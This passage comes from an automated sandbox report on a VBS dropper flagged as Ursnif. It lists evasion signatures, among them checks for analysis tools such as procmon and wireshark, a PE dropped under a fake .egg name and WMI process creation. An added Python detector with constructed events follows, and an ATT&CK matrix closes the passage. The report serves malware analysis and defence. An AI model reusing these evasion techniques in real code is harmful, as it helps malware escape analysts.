Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
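Taken together, the persistence and evasion entries above describe one chain for wscript.exe: WMI reads of Win32_Processor, Win32_ComputerSystem and Win32_LogicalDisk, a PE written to the Temp folder under the non-executable name fuss.egg, a child process started through Win32_Process::Create, and deletion of 154.vbs. The Python below is an added example, not part of this report or its signatures: it scores a script host's recorded events against that chain, verifying the "PE with non-matching extension" indicator by the MZ/PE headers rather than the name. The event schema (pid, process, type and per-type fields) is constructed for the illustration and is not a Sysmon or ETW layout; the MZ/PE blob is a constructed stand-in for the dropped file.

```python
"""Score a script host's recorded behaviour against the chain this report describes.
Added example, not part of the sandbox report. Event records use a constructed,
simplified schema (pid / process / type plus per-type fields), not Sysmon or ETW names."""
import ntpath
import struct
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# WMI classes the report shows being read; two or more from one process counts as fingerprinting
FINGERPRINT_CLASSES = {"Win32_Processor", "Win32_ComputerSystem", "Win32_LogicalDisk"}
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def looks_like_pe(data: bytes) -> bool:
    """True when data starts with a DOS 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def minimal_pe_bytes() -> bytes:
    """Constructed stand-in for a dropped executable: MZ stub, e_lfanew = 0x40, PE signature."""
    buf = bytearray(b"MZ" + b"\0" * 0x3E)        # 0x40-byte DOS header
    struct.pack_into("<I", buf, 0x3C, 0x40)       # e_lfanew -> offset 0x40
    buf += b"PE\0\0" + b"\0" * 20                 # signature followed by a zeroed COFF header
    return bytes(buf)


def score_events(events):
    """Return {pid: (score, reasons)} for script-host processes that show report indicators."""
    script_of = {}                    # pid -> script path taken from its process_start record
    wmi_classes = defaultdict(set)    # pid -> fingerprinting classes it queried
    reasons = defaultdict(list)
    for ev in events:
        if ev["process"].lower() not in SCRIPT_HOSTS:
            continue
        pid, kind = ev["pid"], ev["type"]
        if kind == "process_start":
            script_of[pid] = ev["script"].lower()
        elif kind == "wmi_query" and ev["class"] in FINGERPRINT_CLASSES:
            wmi_classes[pid].add(ev["class"])
        elif kind == "wmi_method" and ev["method"] == "Win32_Process::Create":
            reasons[pid].append("process creation via WMI (Win32_Process::Create)")
        elif kind == "file_write":
            ext = ntpath.splitext(ev["path"])[1].lower()
            if looks_like_pe(ev["content"]) and ext not in PE_EXTENSIONS:
                reasons[pid].append(f"PE content written with non-PE extension: {ev['path']}")
        elif kind == "file_delete" and ev["path"].lower() == script_of.get(pid):
            reasons[pid].append(f"script deleted its own file: {ev['path']}")
    for pid, classes in wmi_classes.items():
        if len(classes) >= 2:
            reasons[pid].append("VM/sandbox fingerprinting via WMI: " + ", ".join(sorted(classes)))
    return {pid: (len(r), r) for pid, r in reasons.items()}


# Constructed events modelled on the report's findings, plus a benign inventory script as a control.
SAMPLE_EVENTS = [
    {"pid": 5968, "process": "wscript.exe", "type": "process_start", "script": r"C:\Users\user\Desktop\154.vbs"},
    {"pid": 5968, "process": "wscript.exe", "type": "wmi_query", "class": "Win32_Processor"},
    {"pid": 5968, "process": "wscript.exe", "type": "wmi_query", "class": "Win32_ComputerSystem"},
    {"pid": 5968, "process": "wscript.exe", "type": "wmi_query", "class": "Win32_LogicalDisk"},
    {"pid": 5968, "process": "wscript.exe", "type": "file_write",
     "path": r"C:\Users\user\AppData\Local\Temp\fuss.egg", "content": minimal_pe_bytes()},
    {"pid": 5968, "process": "wscript.exe", "type": "wmi_method", "method": "Win32_Process::Create"},
    {"pid": 5968, "process": "wscript.exe", "type": "file_delete", "path": r"C:\Users\user\Desktop\154.vbs"},
    {"pid": 7001, "process": "cscript.exe", "type": "process_start", "script": r"C:\Tools\inventory.vbs"},
    {"pid": 7001, "process": "cscript.exe", "type": "wmi_query", "class": "Win32_LogicalDisk"},
    {"pid": 7001, "process": "cscript.exe", "type": "file_write",
     "path": r"C:\Tools\report.txt", "content": b"C: 120 GB free\r\n"},
]

if __name__ == "__main__":
    for pid, (score, why) in score_events(SAMPLE_EVENTS).items():
        print(pid, score, *why, sep="\n  ")
```

The single Win32_LogicalDisk read by the control script is deliberately not scored: one inventory query is ordinary administration, and it is the combination of several fingerprinting classes with a dropped PE under a misleading extension and WMI-based process creation that distinguishes this sample's behaviour.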

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fuss.egg.0.dr
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bundle.zip VolumeInformation (11 entries)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
(digits appended to a technique name are the report's own signature-count markers; "-" marks an empty cell)

Valid Accounts | Windows Management Instrumentation 221 | Path Interception | Process Injection 1 | Masquerading 11 | OS Credential Dumping | Security Software Discovery 341 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 4 | LSASS Memory | Virtualization/Sandbox Evasion 4 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting 121 | NTDS | System Information Discovery 125 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features

Behavior Graph

[Interactive behavior graph not reproduced. Its legend distinguishes: process, signature, created file, DNS/IP info, dropped, Windows process, number of created registry values, number of created files, source language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious, Internet.]